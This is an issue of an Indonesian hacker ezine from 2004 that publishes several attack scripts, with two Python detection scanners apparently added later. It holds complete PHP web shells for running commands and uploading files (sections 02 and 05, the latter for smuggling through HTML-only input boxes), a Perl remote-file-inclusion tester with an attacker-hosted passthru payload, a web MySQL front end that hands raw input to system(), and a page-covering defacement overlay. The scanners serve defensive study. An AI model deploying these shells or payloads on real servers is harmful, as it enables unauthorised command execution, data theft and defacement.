
Echo Magazine Issue 09 Phile 0x013

Published in Echo Magazine · 4 years ago

  




- ____________________ ___ ___ ________
--\_ _____/\_ ___ \ / | \\_____ \--
-| __)_ / \ \// ~ \/ | \--
-| \\ \___\ Y / | \--
-/_______ / \______ /\___|_ /\_______ /-
- -\/ -\/ -\/ -\/-


.OR.ID
ECHO-ZINE RELEASE 09

Author: y3dips && K-159
Online @ www.echo.or.id :: http://ezine.echo.or.id


== ECHO Skrapt 2004 ==

01./Log browser info and IP >dot< php ~[ y3dips ]
02./Uplod File && $hell command via browser >dot< php ~[ y3dips ]
03.\General PHP injection Testing script >dot< perl ~[ y3dips ]
04.|MySQL management under web ~[ K-159 ]
05.\PHP upload file in HTML rulez.. ~[ K-159 ]
06.\using DIV to manipulate all of the page area :) (*smart enough, isn't it) ~[k-159 ]

.: BEGIN

+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++


01. Script for Logging IP and BROWSER INFO

By : y3dips
Language : PHP
Resource : PHP book, from phpinfo(); (to get the variable)
Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt
Comment : this script is written in the PHP programming language; it was originally used on
the echo.or.id site, for its index page


/*----- snip -----


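<html>
<head>
<title> catet info browser dan ip </title>
</head>
<body>
<p>
<?php
// Request data comes from $_SERVER; the bare $REMOTE_ADDR-style globals relied on register_globals.
// Every header is client-controlled, so HTML-escape it and pass it to printf as an argument,
// never inside the format string.
function h($key) {
    return htmlspecialchars(isset($_SERVER[$key]) ? $_SERVER[$key] : "", ENT_QUOTES);
}
$date = date("D, d F Y");

if (h("HTTP_VIA") == "")
    // no Via header: show the connecting address
    printf("<div align=center>%s ::
diakses dari<i><b> ip </b></i> <b>%s</b><br> dengan <i><b> browser</b></i>
<b>%s</b> </div>", $date, h("REMOTE_ADDR"), h("HTTP_USER_AGENT"));
else
    // request came through a proxy: X-Forwarded-For is whatever the client or proxy sent, not a verified address
    printf("<div align=center>%s ::
diakses dari<i><b> ip </b></i> <b>%s</b><br> dengan <i><b> browser</b></i>
<b>%s</b> melalui <b>%s</b> dengan ip <i>%s</i></div>", $date, h("HTTP_X_FORWARDED_FOR"), h("HTTP_USER_AGENT"), h("HTTP_VIA"), h("REMOTE_ADDR"));
?>
</p>
</body>
</html>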


------- snip -----*/






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







02. Uplod File && $hell command via browser >dot< php ~[ y3dips ]

By : y3dips
Language : PHP
Resource : .....PHP book, PHP manual <dot> chm
Published: ....
Comment : this script is written in the PHP programming language and serves as a page
for uploading files and executing $hell commands via the browser, given 'certain'
settings that are "allowed" in php.ini and httpd.conf

/*----- snip -----

<!-- upload php shell made by y3dips (echo.or.id) for test only -->
<!-- greetz to K-159 ,the_day, z3r0byt3, m0by , comex, c-a-s-e , S'to -->
<html>
<head>
<title>#E-C-H-O Upl0ad $hell</title>
</head>
<BODY bgcolor="#000000">
<!-- set the directory -->
<? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?>
<table>
<tr><td bgcolor=#cccccc>

<!-- execute command with passthru -->

<?
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<!-- upload file -->
<?
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>

<!-- command execution form -->

<?
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >

<!-- form upload -->

<?
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
</html>


------- snip -----*/






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++






03.\General PHP injection Testing script


By : y3dips
Language : PeRl
Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt
Published: ... in this ezine
Comment : This script was written to test remote injection against vulnerable PHP;
it really just takes over the role of the browser, and in particular can be developed
further to use a file as the target database *_^




Instructions:

enter the full path of the vulnerable target, matching its vulnerability, e.g.:
$target = www.dudul.com/index.php?pageurl=

and the full path of the exploit file (read about injection script in attacker side)
$xploit = www.keren.com/echo.txt


and what needs to be typed as input is
perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt


/*----- snip -----

# xplo.pl
#!/usr/bin/perl -w
# Remote Testing PHP injection by y3dips [for testing only]

print " * Remote Testing PHP injection by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0];
$xploit= $ARGV[1];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target$xploit";

my $injek = $ua->get($url);

print "---------------------------------------------------\n";

if ($injek->is_success)
{ print (" Sepertinya Vulnerable\n"); }
else { print (" Sepertinya Tidak Vulnerable\n"); }

print "---------------------------------------------------\n";

}

else{
print "Gunakan: perl $0 [path vulnerable] [path xplo] \n";
}



=====================


echo.txt


-- cut --

<?
echo "".passthru(' id ')."";
?>

-- cut --

------- snip -----*/
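
A detection counterpart to the tester above, added here as an example and not part of the original article: it scans web-server access logs for query parameters whose value names a remote resource, and for the "MSIE/6.0 Windows" agent string that xplo.pl sets. The log lines, addresses and host names are constructed samples, and the function and pattern names are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2004:13:55:36 +0700] "GET /index.php?pageurl=http://files.example/echo.txt HTTP/1.1" 200 512 "-" "MSIE/6.0 Windows"',
    '198.51.100.4 - - [10/Oct/2004:13:56:02 +0700] "GET /index.php?pageurl=news HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [10/Oct/2004:13:57:40 +0700] "GET /index.php?pageurl=www.files.example/echo.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2004:13:58:11 +0700] "GET /go.php?next=%68ttp%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# A value that names a remote resource: "scheme://..." in general, or the bare
# "host.tld/path" shape shown in the article's usage line.
REMOTE_VALUE = re.compile(r'^(?:[a-z][a-z0-9+.-]*://|(?:[a-z0-9-]+\.)+[a-z]{2,}/)', re.I)
TOOL_AGENT = "MSIE/6.0 Windows"  # agent string set by xplo.pl


def check_line(line):
    """Return a finding dict for one log line, or None if nothing stands out."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, target, status, agent = m.groups()
    reasons = []
    query = target.partition("?")[2]
    # parse_qsl percent-decodes, so encoded schemes are caught as well
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE.match(value.strip()):
            reasons.append("remote-include:" + name)
    if agent == TOOL_AGENT:
        reasons.append("tool-user-agent")
    if not reasons:
        return None
    return {"ip": ip, "status": int(status), "reasons": reasons}


def scan_access_log(lines):
    """Check every line and keep the findings."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

An HTTP 200 on a flagged request is the same signal the tester reports as "Sepertinya Vulnerable", so those hits deserve the first look. On the application side, choosing include targets from a fixed allowlist removes the condition being probed.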






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







04.\MySQL management under web


By : k-159
Language : Php
Resource : ..., based on explorer 1.4 lost noobs
Published: ... in this ezine
Comment : Manage SQL under web base


/*----- snip -----


<!-- sql remote injection script by K-159 -->
<!-- @t http://aikmel.com en http://echo.or.id -->
<!-- based on explorer 1.4 lost noobs -->

<html>
<head><title>.:You Landed on K-159 Project:.</title>
<body bgcolor="blue">

<?

echo("
<FORM ENCTYPE=\"multipart/form-data\" METHOD=POST>
<br><br><hr><br><br>

Enter mysql client binary <br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">

<br><br>Enter the login<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">

<br><br>Enter the password<br>
<input name=\"sql_password\" type=\"text\" value=\"none\">

<br><br>Enter address of target<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">

<bR><br>Enter other port of mysql<br>
<input name=\"sql_options\" type=\"text\" value=\"\">


<br><br>Enter valid SQL queries<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>

<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>

");


if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
}

else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
} // end of else
}

?>
</html>

------- snip -----*/







+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







05.\PHP upload file in HTML rulez..


By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : this script was made while trying to build an upload script by piggybacking on a box
(comment, input) that only accepts HTML input, but the server allows PHP to execute :)


/*----- snip -----

<html>
<head>
<title>K-159 Project</title>
</head>
<BODY bgcolor="#000000">


<script language="php">
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
</script>
<table>
<tr><td bgcolor=#cccccc>

<script language="php">
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ;uname -ar;pwd ;id;cat /etc/hosts "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
</script>
</td></tr></table>

<script language="php">
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file [ ".$HTTP_POST_FILES["filenyo"][name]." ] Error Cuk !!
!!</div></font></td></tr></table>");
}
</script>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>

<script language="php">
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >

<script language="php">
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
</html>
------- snip -----*/
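
The shells in sections 02 and 05 and the MySQL front end in section 04 share two static markers: a PHP open tag inside content that should be plain HTML, and a shell-executing function fed from a variable. The scanner below is an added example, not code from the article; its names and the sample markup are constructed for illustration, and a match is a lead for review, not proof.

```python
import re

# Ways a PHP block is opened in the scripts above: "<?php", short "<?", "<?=", and the
# <script language="php"> form of section 05 (honoured by PHP before 7.0).
# "<?xml" declarations are excluded.
PHP_OPEN = re.compile(r'<\?(?!xml\b)|<script\s+language\s*=\s*["\']?php\b', re.I)
# Functions that pass a string to the operating system, with their argument text.
EXEC_CALL = re.compile(r'\b(passthru|system|exec|shell_exec|popen|proc_open)\s*\(([^;]*)', re.I)
# Request-controlled data: superglobals and the legacy $HTTP_*_VARS / $HTTP_POST_FILES arrays.
REQUEST_VAR = re.compile(
    r'\$(?:_(?:GET|POST|REQUEST|COOKIE|FILES)|HTTP_(?:GET|POST|COOKIE)_VARS|HTTP_POST_FILES)\b')

# Constructed sample of user-submitted markup, reusing statement shapes from the article.
SAMPLE = r'''<p>nice site</p>
<script language="php">
echo "".passthru($_POST['cmd'])."";
</script>
<? system($system_cmd,$var); ?>
<?xml version="1.0"?>
<input value="<?php echo exec("pwd"); ?>">
'''


def scan_submitted_markup(text):
    """Return (line_number, finding) pairs for content that should contain no PHP."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if PHP_OPEN.search(line):
            findings.append((number, "php-open-tag"))
        for call in EXEC_CALL.finditer(line):
            name, argument = call.group(1).lower(), call.group(2)
            if REQUEST_VAR.search(argument):
                findings.append((number, "request-to-" + name))
            elif "$" in argument:
                findings.append((number, "variable-to-" + name))
    return findings


if __name__ == "__main__":
    for finding in scan_submitted_markup(SAMPLE):
        print(finding)
```

Run it over upload directories and stored comment or input fields; a call with a literal argument, such as exec("pwd"), is reported only through its open tag.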







+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







06.\using DIV to manipulate all of the page area :) (*smart enough, isn't it? )


By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : this script is used to cover all the other scripts (by using a DIV)


Instructions: place this snippet above the code of "your page" :D


/*----- snip -----

<div id="Layer1" style="position:absolute; left:0; top:0; width:4000; height:4090;
z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000">

------- snip -----*/



+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++





Disclaimer:

all scripts in this article are for educational purposes; echo.or.id does not accept responsibility
for any damage or injury caused as a result of their use


*greetz to:

the kids at newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
all $ecurity Industry 1n INDONESIA

send criticism && suggestions to echostaff[at]echo<dot>or<dot>id

